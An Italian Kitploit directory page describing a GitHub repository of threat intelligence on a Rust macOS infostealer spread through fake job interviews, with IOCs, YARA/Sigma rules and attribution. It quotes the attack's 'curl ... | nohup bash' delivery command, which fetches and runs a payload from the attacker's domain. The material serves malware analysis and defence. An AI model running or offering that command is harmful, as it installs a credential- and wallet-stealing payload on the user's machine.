Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
hyperhives-macos-infostealer-analysis — Analisi statica completa dell'information stealer Rust di HyperHive per macOS — 571 valori di configurazione decifrati, infrastruttura C2, attribuzione DPRK/Contagious Interview, regole YARA/Sigma, bundle STIX 2.1, layer ATT&CK Navigator | Kitploit
Strumenti/GitHubGitHub/darksp33d/hyperhives-macos-infostealer-analysis
Gestione degli Indicatori di Compromissione (IOC)OSINT (Open Source Intelligence)Reverse EngineeringInformatica ForenseAnalisi MalwareThreat IntelligencePaper e RicercaApprendimento e FormazioneRisorse Curate

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
GitHubdarksp33d/hyperhives-macos-infostealer-analysis

hyperhives-macos-infostealer-analysis

Analisi statica completa dell'information stealer Rust di HyperHive per macOS — 571 valori di configurazione decifrati, infrastruttura C2, attribuzione DPRK/Contagious Interview, regole YARA/Sigma, bundle STIX 2.1, layer ATT&CK Navigator

Vedi RepositorySito web
314115 mesi faRevisionato da Kitploit
Condividi

HyperHives macOS Infostealer — Analisi Tecnica Completa

Validate Repository License: MIT STIX 2.1 ATT&CK Navigator

Intelligence sulle minacce: infostealer binario universale macOS basato su Rust diffuso attraverso un finto processo di colloquio di lavoro su Wellfound (ex AngelList). La persona operativa "Felix" di "HyperHive" ha indotto le vittime ad eseguire un installer malevolo da macos.hyperhives.net. Questo repository documenta l'analisi statica completa: 571 valori di configurazione crittografati recuperati, inclusi URL C2, un Sentry DSN e 276 ID di estensioni Chrome presi di mira.

SHA-256 del campione5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3
Dominio C2cloudproxy.link
Dominio di consegnamacos.hyperhives.net
Piattaforma di attrazioneWellfound (ex AngelList)
Persona operativa"Felix" presso "HyperHive"
VirusTotal9 / 63 rilevamenti
ClassificazioneDivulgazione pubblica / bundle IOC
Ultimo aggiornamentoAprile 2026

Indice

  • Bundle di threat intelligence
  • Struttura del repository
  • Avvio rapido
  • TL;DR
  • 1 — Come è iniziato
  • 2 — Il binario
  • 3 — Cosa ruba
  • 4 — Infrastruttura C2 decifrata
  • 5 — Attribuzione
  • 6 — Crittoanalisi
  • 7 — Mapping MITRE ATT&CK
  • 8 — Riferimento per wallet e ID estensione
  • 9 — Azioni consigliate
  • 10 — Metodologia
  • Appendice A — Tutti i 276 ID di estensioni Chrome
  • Ambito e limitazioni
  • Cronologia delle versioni
  • Contribuire
  • Licenza

Bundle di threat intelligence

FileFormatoScopo
iocs.txtTesto sempliceHash, domini, URL, IP, email, Sentry ID — incollare in blocklist, MISP, OpenCTI
yara_rules.yarYARA 4.2+Corrispondenza hash di campioni noti + rilevamenti euristici di stringhe per Mach-O
sigma_rules.ymlSigmaRegole per proxy, DNS e creazione processi — regola logsource per il tuo SIEM
stix/bundle.jsonSTIX 2.1Bundle CTI leggibile da macchina con indicatori, SDO malware, infrastruttura, pattern ATT&CK e relazioni
attack-navigator-layer.jsonATT&CK NavigatorImporta in ATT&CK Navigator per la copertura visiva delle tecniche

Struttura del repository```

. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist

## Avvio rapido

Posiziona il campione come `sample/installer_binary` (vedi [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md) per la verifica dell'hash), quindi:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py

Il file compose impone network_mode: none, read_only: true e rimuove tutte le capacità Linux. Consulta SECURITY.md per le linee guida complete.


TL;DR

Un annuncio di lavoro su Wellfound (ex AngelList) ha portato a una catena di social engineering via email multipla da parte di un operatore con il personaggio "Felix" di "HyperHive". Dopo aver lodato il background tecnico del bersaglio e aver fissato un finto colloquio, l'attaccante ha invitato la vittima a "visionare il prodotto" su hyperhives.net e a esaminare specificamente Settings → Diagnostics → Log — un pretesto per innescare l'esecuzione di:``` curl -s https://macos.hyperhives.net/install | nohup bash &

Il payload è un **binario universale Mach-O da 8.5 MB** (x86_64 + arm64) compilato in Rust. L'analisi statica con un laboratorio Docker isolato (air-gapped) e l'emulazione CPU di **570 routine helper x86_64 uniche** ha recuperato **tutti i 571 valori di configurazione crittografati**, rivelando:

- **C2:** `cloudproxy.link` — quattro endpoint HTTPS
- **Sentry (pivot di attribuzione):** DSN completo con ID org/project su `ingest.de.sentry.io`
- **Identità della build:** utente Cargo `rootr`, nome in codice `force`, versione `9.12.1`
- **Target:** 276 ID di estensioni Chrome (portafogli crypto, gestori di password, credenziali aziendali)

Le tattiche sono in linea con le campagne **Contagious Interview collegate alla Corea del Nord** — reclutamento fittizio su piattaforme legittime, costruzione della fiducia in più passaggi, distribuzione tramite `curl | bash`, stealer Rust per macOS, ed esfiltrazione focalizzata su criptovalute.

---

## 1 — Come è iniziato

### L'esca: colloquio di lavoro falso su Wellfound
Scarica lo strumento